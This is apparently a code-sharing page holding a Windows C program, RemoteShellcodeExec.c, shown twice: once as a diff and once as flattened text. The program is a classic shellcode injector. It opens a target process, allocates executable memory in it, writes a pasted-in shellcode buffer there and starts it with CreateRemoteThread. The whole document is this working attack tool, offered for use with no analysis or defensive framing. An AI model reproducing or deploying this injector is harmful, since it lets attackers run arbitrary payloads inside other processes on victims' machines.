0xntpower · December 23, 2023 12:21
diff --git a/RemoteShellcodeExec.c b/RemoteShellcodeExec.c
 #include <stdio.h>
 #include <Windows.h>

 unsigned char buf[] = "...";  // Paste your shellcode here

 int main(int argc, char** argv)
 {
    // Get the process ID of the target process
    DWORD targetProcessId = 00000;

    // Open the target process
    HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | 
                                  PROCESS_QUERY_INFORMATION | 
                                  PROCESS_VM_OPERATION | 
                                  PROCESS_VM_WRITE, FALSE, targetProcessId);
    if (hProcess == NULL)
    {
        printf("OpenProcess failed, error %lu\n", GetLastError());
        return 1;
    }

    // Allocate memory for shellcode in the target process
    LPVOID remoteShellcode = VirtualAllocEx(hProcess, 0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (remoteShellcode == NULL)
    {
        printf("VirtualAllocEx failed, error %lu\n", GetLastError());
        CloseHandle(hProcess);
        return 1;
    }

    // Write the shellcode to the allocated memory in the target process
    if (!WriteProcessMemory(hProcess, remoteShellcode, buf, sizeof(buf), NULL))
    {
        printf("WriteProcessMemory failed, error %lu\n", GetLastError());
        VirtualFreeEx(hProcess, remoteShellcode, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return 1;
    }

    // Create a remote thread in the target process to execute the shellcode
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)remoteShellcode, NULL, 0, NULL);
    if (hThread == NULL)
    {
        printf("CreateRemoteThread failed, error %lu\n", GetLastError());
        VirtualFreeEx(hProcess, remoteShellcode, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return 1;
    }

    // Wait for the remote thread to finish
    WaitForSingleObject(hThread, INFINITE);

    printf("Shellcode has been executed in the remote process!\n");

    // Clean up
    CloseHandle(hThread);
    VirtualFreeEx(hProcess, remoteShellcode, 0, MEM_RELEASE);
    CloseHandle(hProcess);

    return 0;
 }
	#include <stdio.h>
	#include <Windows.h>

	unsigned char buf[] = "..."; // Paste your shellcode here

	int main(int argc, char** argv)
	{
	// Get the process ID of the target process
	DWORD targetProcessId = 00000;

	// Open the target process
	HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD \|
	PROCESS_QUERY_INFORMATION \|
	PROCESS_VM_OPERATION \|
	PROCESS_VM_WRITE, FALSE, targetProcessId);
	if (hProcess == NULL)
	{
	printf("OpenProcess failed, error %lu\n", GetLastError());
	return 1;
	}

	// Allocate memory for shellcode in the target process
	LPVOID remoteShellcode = VirtualAllocEx(hProcess, 0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (remoteShellcode == NULL)
	{
	printf("VirtualAllocEx failed, error %lu\n", GetLastError());
	CloseHandle(hProcess);
	return 1;
	}

	// Write the shellcode to the allocated memory in the target process
	if (!WriteProcessMemory(hProcess, remoteShellcode, buf, sizeof(buf), NULL))
	{
	printf("WriteProcessMemory failed, error %lu\n", GetLastError());
	VirtualFreeEx(hProcess, remoteShellcode, 0, MEM_RELEASE);
	CloseHandle(hProcess);
	return 1;
	}

	// Create a remote thread in the target process to execute the shellcode
	HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)remoteShellcode, NULL, 0, NULL);
	if (hThread == NULL)
	{
	printf("CreateRemoteThread failed, error %lu\n", GetLastError());
	VirtualFreeEx(hProcess, remoteShellcode, 0, MEM_RELEASE);
	CloseHandle(hProcess);
	return 1;
	}

	// Wait for the remote thread to finish
	WaitForSingleObject(hThread, INFINITE);

	printf("Shellcode has been executed in the remote process!\n");

	// Clean up
	CloseHandle(hThread);
	VirtualFreeEx(hProcess, remoteShellcode, 0, MEM_RELEASE);
	CloseHandle(hProcess);

	return 0;
	}
No results found